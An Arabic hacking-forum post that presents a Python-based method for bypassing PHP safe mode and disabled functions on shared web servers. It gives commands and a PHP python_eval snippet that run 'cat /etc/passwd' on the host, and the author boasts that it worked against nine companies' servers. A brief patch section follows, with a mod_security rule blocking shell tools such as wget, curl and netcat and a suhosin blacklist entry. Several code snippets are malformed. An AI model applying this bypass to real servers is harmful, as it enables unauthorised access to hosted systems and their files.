السلأم عليكم ورحمة الله وبركاتهَ ..


شخباركم شباب ..


كلنا سمعنا زمان عن الباثيون وخطورته ..

ومثل ماحنى عارفين ثغرات الـ perl بدت بـ الانقراضَ والحمد لله اكثر الشركات هنا تم التجريب جميع ثغرات البيرل وبادت بالفشلَ

وقدرت اتخطى بـ الباثيون وقرائة الملفات بشكل مباشر بدون السيملنك ولا غيره ، قرائه مباشرهَ

علماَ اللي يقول انا مو مثبت باثيون بـ سيرفر بسيطه ، يستطيع المخترق رفع مترجم خاص فيهَ

وتعددت الطرق ولكن هنا الحل بـ اذن الله ، جربته على كم سيرفر عندي وفعال 100 % بـ اذن اللهَ

يستطيع المخترق تشغيل الباثيون عن طريق المسار الافتراضي

كود:
#!/usr/bin/python
ان لم نصب الباثيون يستطيع تشغيل الشل والقرائه عن طريق : -

+
كود PHP:
                       #!python -w -I/home/meshal/public_html/meshal/meshal.py 
نستنتج من الكلمه باللون الاحمر انه رفع مترجم على نفس الملف وتشغيل بكل سهولهَ وهذي طريقتي الخاصه ولـ عيونكم ننزله نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي

يستطيع المخترق تشغيل ملفاته عن طريق استخدام الاوامر بهذا الشكل



كود PHP:
                        python meshal.py cat /etc/passwd 
او يستطيع تشغيلها من ملف php


كود PHP:
                        $codepython_eval 
(
import os 
pwd = os.getcwd() 
print pwd 
os.system('
cat /etc/passwd') 
'
); 
بعض الملعومآت عن الثغره ، :-

نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي


1) تخطي تعطيل الدوآل ، في حالة كان الـSafe mode = off .
2) تخطي الـ Safe Mode على اكبر ، السيرفرات .
3) تخطي ، صحفات Forbidden و Internal Error عند تشغيل ، ملفات البــايثون .
4) ماتحتاج ملف .htaccess او أي اضافات خارجيه : فقط المترجم ، ( عكس البيرل )
5) لاتعتمد على دوال الـ PHP ابداً ،

طولنآ عليكمَ بس حبيت اوضح ، مدى خطورهآ لأني شفت ، خطورتهآ بـ نفسي ، بـ العربي ( 9 شركات هنا جربتهآ عليهم وشغاله 100 % ) نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي

الترقيعَ بسيط جداً وجربته ، بـ نفسيَ

1) أضافة بـ المود سكيورتيَ


كود PHP:
[PHP]                       SecRule REQUEST_URI|REQUEST_BODY "(cmd|command)=(cd|\;|perl |killall |[COLOR="Red"]python[/COLOR] |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |lwp-(download|request|mirror|rget) |id|uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z])" 
[/PHP]
2) وضع دالة بالبلاك لست بـ برنامج suhosin


كود PHP:
                       python_eval 
طريقةالترقيع قعدت 3 ايامَ جربت كل الطرق العميقه بـ نواة الليونكس لـ منع الباثيون لكن ، باتت بـ الفشل لـ الاسف ، فـ جربت الطريقه هذي وتوقف عملهَ 100 %

إْنتهى ، اتمنى ، استفدتوآ من هـ الشرحَ وانشاء الله يكون وآفيَ .. وبالتوفيقَ نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي